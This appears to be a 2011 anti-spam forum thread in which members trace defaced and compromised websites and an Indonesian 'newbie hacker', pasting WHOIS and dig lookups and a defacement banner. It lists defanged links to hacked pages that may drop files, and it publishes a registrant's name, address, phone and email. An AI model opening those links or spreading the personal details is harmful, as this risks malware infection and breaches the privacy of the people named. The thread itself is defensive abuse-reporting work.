A search on this active member of newbie hacker ArRay a.k.a XterM brings up this web site.

hXXp://armypratama.eu/


Lots of hacking tools some written by ArRay a.k.a XterM

hXXp://www.facebook.com/armypratama

Armÿ Pratama
Studied Networking at STMIK Bidakara Lives in Manhattan, New York From Jakarta, Indonesia

Domain Reg armypratama.eu
Name Paul R Everett
Organisation N/A
Language German
Address 412 Thorngate Drive
D-39042 Brandon
Germany
Phone +49 6014975401
Email korek_minjem@yahoo.com

dig armypratama.eu

; <<>> DiG 9.6-ESV-R3 <<>> armypratama.eu
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39124
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;armypratama.eu. IN A

;; ANSWER SECTION:
armypratama.eu. 11986 IN A 74.86.183.210

;; AUTHORITY SECTION:
armypratama.eu. 83986 IN NS ns1.speedydns.net.
armypratama.eu. 83986 IN NS ns2.speedydns.net.

;; Query time: 105 msec
;; SERVER: 203.114.168.2#53(203.114.168.2)
;; WHEN: Mon Jan 17 20:43:13 2011
;; MSG SIZE rcvd: 97

whois 74.86.183.210
#
# Query terms are ambiguous. The query is assumed to be:
# "n 74.86.183.210"
#
# Use "?" to get help.
#

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=74.86 ... ARIN=false
#

NetRange: 74.86.0.0 - 74.86.255.255
CIDR: 74.86.0.0/16
OriginAS: AS36351
NetName: SOFTLAYER-4-4
NetHandle: NET-74-86-0-0-1
Parent: NET-74-0-0-0-0
NetType: Direct Allocation
NameServer: NS2.ARPA.GLOBAL-DATACENTER.COM
NameServer: NS1.ARPA.GLOBAL-DATACENTER.COM
Comment: abuse@softlayer.com
RegDate: 2007-05-16
Updated: 2009-08-26
Ref: http://whois.arin.net/rest/net/NET-74-86-0-0-1

OrgName: SoftLayer Technologies Inc. < Criminal spam supporter.
OrgId: SOFTL
Address: 1950 N Stemmons Freeway
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US

Some of these hackers make themselves easy targets.
Amouse
Spam Reporter

Re: Compromised hosts

Postby spamislame » Mon Jan 17, 2011 10:51 am

Huh.

You originally lost me about here:

Amouse wrote: hXXp://sidneilino.com.br/relief/heavy/ Tag in top level Hacked by Mhiman Hnc > tabletscapsulesdrugstore.net
Special note. The above web site may be trying to drop a file on browsers' machines.
hXXp://silverdutchman.nl/Media/strong/

Extra info from Mhiman tag.

Domain Name:HACKER-NEWBIE.ORG

Huh.

http://sidneilino.com.br/

===================================================================
-__Status : Deface
-__Nick : Mhiman HNc
-__Forum : Hacker-Newbie.org
-__Notice For Admin : Check Ur Security
-__Mhiman note Messege : Don't Panic Your Database Safe
-__Thanks For : Onestree[IHT],Up_[HNc]Jahat[HNc],N4is3N[HNc],l1n6g4[HNc],All my Hacker-newbie.org And All Indonesian Hacker Team
-=-[ Hacker-newbie.org ]-=-

He's posted this to one other server, rupagroup.net, but they took it down.

Have you contacted the operator or the hosting company of that site? Might be worth asking how they got in.

hacker-newbie.org is hosted on IP 180.235.148.57, located in Tangerang, Banten, Indonesia.

SiL

P.S.: Also check out these files on that compromised host:

http://sidneilino.com.br/relief/412c1ec8358dabd85428d95019f250fa.che
http://sidneilino.com.br/relief/584c175287019332837633e29bea1a55.che

SiL
spamislame
Site Admin
